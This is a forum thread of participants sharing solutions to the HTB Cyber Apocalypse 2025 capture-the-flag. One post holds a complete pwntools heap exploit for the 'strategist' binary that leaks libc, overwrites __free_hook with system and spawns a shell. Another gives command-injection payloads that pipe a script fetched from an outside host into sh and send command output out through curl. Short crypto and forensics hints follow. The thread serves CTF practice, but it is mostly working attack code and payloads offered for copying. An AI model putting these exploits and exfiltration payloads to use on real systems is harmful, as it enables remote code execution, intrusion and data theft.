cyber apocalypse HTB ctf 2025
by RedBlock - Friday March 21, 2025 at 11:38 AM
#51
(Mar 25, 2025, 07:42 PM)HTBContestant Wrote:
(Mar 25, 2025, 07:26 PM)adyadam Wrote:
(Mar 25, 2025, 04:17 PM)nigletasd Wrote: from pwn import *
# Challenge artefacts. libc/ld are the copies shipped with the challenge; the
# loader is opened here but not referenced anywhere else in this listing.
libc = ELF("./glibc/libc.so.6")
ld = ELF("./glibc/ld-linux-x86-64.so.2")
# The target binary; registering it as context.binary lets pwntools pick up
# arch/bits/endianness (used by p64() further down) from the ELF header.
elf = ELF("./strategist")
context.binary = elf
#context.terminal = ['tmux', 'splitw', '-hp', '70']   # uncomment to have gdb open in a tmux split
def logbase():
    """Log the current ``libc.address`` as ``libc base = 0x...``."""
    message = "libc base = %#x" % libc.address
    log.info(message)
def logleak(name, val):
    """Log ``val`` in hex under the label ``name`` (``<name> = 0x...``).

    ``name`` is concatenated as-is, so it must already be a ``str``.
    """
    suffix = " = %#x" % val
    log.info(name + suffix)
def start():
    """Open the tube to the target, chosen by the pwntools ``args`` switches.

    ``REMOTE`` connects to the challenge host -- ``"ip"`` is a placeholder and
    ``port`` is not defined anywhere in this listing, so both must be filled
    in before that mode works. ``GDB`` runs the binary under gdb with the
    ``gs`` script (also not defined in this listing). With neither switch a
    plain local process is started.
    """
    target = [elf.path]
    if args.REMOTE:
        tube = remote("ip", port)
    elif args.GDB:
        tube = gdb.debug(target, gdbscript=gs)
    else:
        tube = process(target)
    return tube
# Module-global tube; every new* helper below reads from and writes to it.
p = start()
# pwntools pause(): block until a key is pressed, e.g. to attach a debugger
# before the first interaction.
pause()
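def newRecvall(_t=10):
    """Drain everything the target sends until it goes quiet or closes.

    Calls ``p.recv`` repeatedly with a ``_t``-second timeout and stops on the
    first empty read (what pwntools returns on timeout) or on ``EOFError``
    (connection closed). The collected bytes are logged as a hexdump and
    returned.

    Args:
        _t: per-read timeout in seconds handed to ``p.recv``.

    Returns:
        Everything received, as a single ``bytes`` value (``b""`` if nothing
        arrived before the timeout).
    """
    # Collect chunks and join once instead of re-copying the buffer on every
    # ``data += chunk``.
    parts = []
    while True:
        try:
            chunk = p.recv(timeout=_t)
        except EOFError:
            break
        if not chunk:
            break
        parts.append(chunk)
    data = b"".join(parts)
    log.info(hexdump(data))
    return data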
def newSendline(send):
    """Log ``send`` (as a ``SENDING:`` line and as a hexdump), then send it
    with a trailing newline via ``p.sendline``."""
    banner = b'SENDING: ' + send
    log.info(banner)
    log.info(hexdump(send))
    p.sendline(send)
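def newRecvuntilAndSendline(until, send, _t=10):
    """Read until ``until`` appears in the output, then send ``send`` + newline.

    ``p.recv`` chunks (each with a ``_t``-second timeout) are appended to a
    buffer until ``until`` is a substring of it. An empty read (pwntools'
    timeout result) or ``EOFError`` also ends the loop; the marker was then
    never seen, which is logged as a warning, but ``send`` still goes out so
    the original best-effort behaviour is kept. Everything received is logged
    as a hexdump.

    Args:
        until: byte string to wait for.
        send: bytes passed to ``newSendline`` (which appends the newline).
        _t: per-read timeout in seconds.

    Returns:
        The bytes received before sending (previously discarded), so callers
        can parse prompts or leaks out of them.
    """
    data = b""
    seen = False
    while True:
        try:
            chunk = p.recv(timeout=_t)
        except EOFError:
            break
        if not chunk:
            break
        # Match on the whole buffer: the marker may straddle two chunks.
        data += chunk
        if until in data:
            seen = True
            break
    log.info(hexdump(data))
    if not seen:
        log.warning("marker %r not seen before timeout/EOF; sending anyway" % (until,))
    newSendline(send)
    return data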
def newSend(send):
    """Log ``send`` (as a ``SENDING:`` line and as a hexdump), then send it
    exactly as given -- no newline -- via ``p.send``."""
    banner = b'SENDING: ' + send
    log.info(banner)
    log.info(hexdump(send))
    p.send(send)
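def newRecvuntilAndSend(until, send, _t=10):
    """Read until ``until`` appears in the output, then send ``send`` raw.

    Same loop as ``newRecvuntilAndSendline`` but the reply goes through
    ``newSend`` (no trailing newline), for payloads whose exact bytes matter.
    An empty read (pwntools' timeout result) or ``EOFError`` ends the loop
    without the marker having been seen; that is logged as a warning and
    ``send`` still goes out, keeping the original best-effort behaviour.
    Everything received is logged as a hexdump.

    Args:
        until: byte string to wait for.
        send: bytes passed unchanged to ``newSend``.
        _t: per-read timeout in seconds.

    Returns:
        The bytes received before sending (previously discarded).
    """
    data = b""
    seen = False
    while True:
        try:
            chunk = p.recv(timeout=_t)
        except EOFError:
            break
        if not chunk:
            break
        # Match on the whole buffer: the marker may straddle two chunks.
        data += chunk
        if until in data:
            seen = True
            break
    log.info(hexdump(data))
    if not seen:
        log.warning("marker %r not seen before timeout/EOF; sending anyway" % (until,))
    newSend(send)
    return data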
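def predict_heap_size(requested_bytes):
    """Return the ``size`` header field glibc malloc (x86-64) gives a chunk for
    a request of ``requested_bytes`` bytes.

    Mirrors glibc's ``request2size``: the request plus one size word (8 bytes;
    the chunk's own ``size`` field -- the following chunk's ``prev_size`` word
    overlaps the user data, so it costs nothing) is rounded up to the 16-byte
    alignment, with a minimum chunk size of 32 bytes. The lowest bit
    (PREV_INUSE) is set, as it is when the previous chunk is allocated.

    The previous version added 16 bytes of overhead and had no minimum, so it
    was one 16-byte bin too large for any request whose remainder mod 16 is
    1..8 (e.g. 40 -> 0x41 instead of 0x31, 88 -> 0x71 instead of 0x61).

    Args:
        requested_bytes: byte count passed to ``malloc``; must be >= 0.

    Returns:
        The predicted ``size`` field, e.g. ``predict_heap_size(57) == 0x51``.

    Raises:
        ValueError: if ``requested_bytes`` is negative.
    """
    if requested_bytes < 0:
        raise ValueError("requested_bytes must be non-negative")
    size_sz = 8                 # sizeof(size_t) on x86-64
    alignment = 2 * size_sz     # MALLOC_ALIGNMENT
    min_chunk = 4 * size_sz     # MINSIZE: header + fd/bk pointers
    chunk_size = (requested_bytes + size_sz + alignment - 1) & ~(alignment - 1)
    chunk_size = max(chunk_size, min_chunk)
    return chunk_size | 1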
# Interactive driver. Everything below answers the challenge's text menu; the
# prompts replied to ('How long ...', 'Which plan ...') show that choice 1
# creates a plan, 2 views one, 3 edits one and 4 deletes one, and that plans
# are addressed by a 0-based index (the "1st plan" is deleted/viewed as b'0').
# Sanity check of the chunk-size model for the 57-byte plan used in step 2.
log.info(hex(predict_heap_size(57)))
# step 1: leak libc
# create 1st plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'1280')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'A'*1279)
# create 2nd plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'32')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'B'*31)
# delete 1st plan
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'0')
# recreate 1st plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'1280')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'C'*8)
# show 1st plan
newRecvuntilAndSendline(b'> ', b'2')
newRecvuntilAndSendline(b'Which plan you want to view?', b'0', _t=5)
# Slice [0x36:0x3c] takes the 6 significant bytes of a pointer out of the raw
# 'view' output; the offsets depend on this binary's output format, so check
# them against the hexdump newRecvall logs if the value looks wrong.
libc_addr_leak = int.from_bytes(newRecvall(_t=5)[0x36:0x3c], byteorder='little')
log.info(b'libc_addr_leak: ')
log.info(hex(libc_addr_leak))
# Distance of the leaked pointer from the libc base; specific to the shipped
# ./glibc/libc.so.6 build. NOTE(review): a correct base is page-aligned
# (ends in 0x000) -- worth asserting before the symbol lookups below.
libc.address = libc_addr_leak - 0x3EBC0A
log.info(b'libc.address: ')
log.info(hex(libc.address))
free_hook = libc.sym['__free_hook']
log.info(b'free_hook: ')
log.info(hex(free_hook))
system_addr = libc.sym['system']
log.info(b'system_addr: ')
log.info(hex(system_addr))
# pause(): wait for a keypress so the state can be inspected in a debugger.
pause()
# step 2: create 3rd,4th,5th
# create 3rd plan
# No wait for '> ' here: the newRecvall above already drained the menu prompt.
newSendline(b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'D'*39)
pause()
# create 4th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'57')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'E'*56)
pause()
# create 5th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'F'*39)
pause()
# edit 3rd plan to overflow to 4th plan's metadata (size)
newRecvuntilAndSendline(b'> ', b'3')
newRecvuntilAndSendline(b'Which plan you want to change?', b'2')
# Raw send (no newline) so exactly 41 bytes go out.
newRecvuntilAndSend(b'Please elaborate on your new plan.', b'G'*40 + b'\x61')
pause()
# delete 5th plan
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'4')
pause()
# delete 4th plan
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'3')
# recreate 4th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'88')
# Raw send: the packed 8-byte value must not get a trailing newline.
newRecvuntilAndSend(b'Please elaborate on your plan.', b'H'*80 + p64(free_hook))
pause()
# create 7th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', b'X'*8)
pause()
# create 8th plan (the original comment said "7th" twice)
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
newRecvuntilAndSendline(b'Please elaborate on your plan.', p64(system_addr))
pause()
# create 9th plan
newRecvuntilAndSendline(b'> ', b'1')
newRecvuntilAndSendline(b'How long will be your plan?', b'40')
# Raw send so the NUL-terminated string is stored exactly as given.
newRecvuntilAndSend(b'Please elaborate on your plan.', b'/bin/sh\0')
pause()
newRecvuntilAndSendline(b'> ', b'4')
newRecvuntilAndSendline(b'Which plan you want to delete?', b'6')
# Hand the tube over to the operator.
p.interactive()
strategist code

I tried it but I don't get any flag

Have you entered your IP and port? Did you run the remote part? Have you clicked through until interactive mode? Have you tried 'ls'?

Sorry, my bad. I hadn't realized I needed to type shell commands Smile
#52
(Mar 25, 2025, 05:19 PM)agohnhfbawuyrbfoiab Wrote:
(Mar 24, 2025, 01:30 PM)lala_mong Wrote:
(Mar 24, 2025, 01:12 PM)oyfyic Wrote:
(Mar 24, 2025, 11:10 AM)0x02b375 Wrote: on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect

I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

Still not working. Kindly assist

While working on this challenge, I had some issues with the '/'. Even though I encoded it twice, it still wasn't working. So instead I used a solve like this:
curl+xx.xx.xx.xx?a=$(ls) just avoid doing any kind of '/', here's the solve :
curl+xx.xx.xx.xx?a=$(cd .. && cd .. && cd .. && cat flag*)
also remember to double encode this.

Hey, are you able to provide the full payload? I tried a few things but it doesn't work.

I used the payload provided by S3d4tion in the thread. Worked like a charm
#53
please some help with traces on crypto i hate this category Sad
#54
(Mar 26, 2025, 12:39 AM)sdksdk Wrote: please some help with traces on crypto i hate this category Sad

The server encrypts every message with AES‑CTR using the same key and nonce, so all messages share the same keystream. Some messages are easy to guess (like “!nick Doomfang”), so XOR the ciphertext for that command with the guess to get the keystream. That gets you started, then use crib dragging to decrypt all messages.
#55
(Mar 25, 2025, 07:09 PM)agohnhfbawuyrbfoiab Wrote: someone has the flag of hillside haven?

https://www.google.com/maps/place/Oak+Vi...FQAw%3D%3D
#56
Can someone give me a hint for Silent Trap, scheduled task? I have no idea where to search for. Tried decompiling the malware too.
#57
(Mar 26, 2025, 06:28 AM)unkn0wn_user404 Wrote: Can someone give me a hint for Silent Trap, scheduled task? I have no idea where to search for. Tried decompiling the malware too.

Stream 34, you need to decrypt it.
#58
Does it have something with this string? SUPPORTHUB_dev-support_Microsoft Windows NT 6.2.9200.0
#59
With silent trap there is a lot of decoding. You have to analyze the downloaded files .
#60
(Mar 26, 2025, 07:36 AM)unkn0wn_user404 Wrote: Does it have something with this string? SUPPORTHUB_dev-support_Microsoft Windows NT 6.2.9200.0

Nope, it is a PowerShell command to set up a scheduled task.

